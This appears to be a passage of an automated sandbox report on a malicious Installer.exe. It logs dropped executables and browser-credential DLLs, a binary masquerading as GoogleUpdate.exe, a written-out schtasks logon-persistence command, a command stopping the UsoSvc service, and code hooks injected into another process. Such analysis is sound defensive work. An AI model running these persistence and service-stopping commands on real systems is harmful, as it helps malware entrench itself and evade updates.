Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

Executable created and started: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	File created: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	File created: C:\Windows\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	File created: C:\Users\user\AppData\Local\Temp\7321.tmp	Jump to dropped file

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST

Source: C:\Windows\System32\dialer.exe

File created: C:\Windows\Tasks\dialersvc32.job

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: DD0005 value: E9 FB 99 F9 76	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 77D69A00 value: E9 0A 66 06 89	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: EE0007 value: E9 7B 4C EC 76	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 77DA4C80 value: E9 8E B3 13 89	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: EF0005 value: E9 FB BF E4 76	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 77D3C000 value: E9 0A 40 1B 89	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: F10008 value: E9 AB E0 E6 76	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 77D7E0B0 value: E9 60 1F 19 89	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: F20005 value: E9 CB 5A 6B 76	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 775D5AD0 value: E9 3A A5 94 89	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: F30005 value: E9 5B B0 6C 76	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 775FB060 value: E9 AA 4F 93 89	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: F40005 value: E9 DB F8 BE 73	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 74B2F8E0 value: E9 2A 07 41 8C	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: F50005 value: E9 FB 42 C0 73	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Memory written: PID: 2980 base: 74B54300 value: E9 0A BD 3F 8C	Jump to behavior
Source: C:\Windows\GoogleUpdate.exe	Memory written: PID: 5852 base: 970005 value: E9 FB 99 3F 77
Source: C:\Windows\GoogleUpdate.exe	Memory written: PID: 5852 base: 77D69A00 value: E9 0A 66 C0 88

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Module Loaded: C:\PROGRAM FILES\GOOGLE\CHROME\UPDATER.EXE

Source: C:\Windows\System32\dialer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager

Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
